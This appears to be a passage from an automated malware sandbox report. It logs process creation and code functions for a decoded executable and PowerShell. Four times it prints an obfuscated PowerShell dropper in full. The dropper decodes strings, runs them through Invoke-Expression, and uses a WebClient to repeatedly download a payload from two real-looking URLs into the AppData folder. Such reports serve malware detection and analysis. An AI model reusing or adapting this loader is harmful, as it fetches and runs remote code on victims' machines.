i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9Jump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CB50
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00457106 push ecx; ret 0_2_00457119
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00457A28 push eax; ret 0_2_00457A46
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00434E56 push ecx; ret 0_2_00434E69
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_10002806 push ecx; ret 0_2_10002819
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0044693D push ecx; ret 4_2_0044694D
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0044DB70 push eax; ret 4_2_0044DB84
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_0044DB70 push eax; ret 4_2_0044DBAC
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 4_2_00451D54 push eax; ret 4_2_00451D61
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_0044B090 push eax; ret 5_2_0044B0A4
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_0044B090 push eax; ret 5_2_0044B0CC
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_00451D34 push eax; ret 5_2_00451D41
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 5_2_00444E71 push ecx; ret 5_2_00444E81
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_00414060 push eax; ret 6_2_00414074
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_00414060 push eax; ret 6_2_0041409C
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_00414039 push ecx; ret 6_2_00414049
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_004164EB push 0000006Ah; retf 6_2_004165C4
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_00416553 push 0000006Ah; retf 6_2_004165C4
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 6_2_00416555 push 0000006Ah; retf 6_2_004165C4
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_027E98B0 push C36F6DB3h; ret 7_2_027E98E8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_06F407A0 push esp; iretd 7_2_06F4093D
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_06F41FB2 push eax; mov dword ptr [esp], ecx7_2_06F421B4
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_00406EB0 ShellExecuteW,URLDownloadToFileW,0_2_00406EB0
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_0041AA4A
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeCode function: 0_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041CB50
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
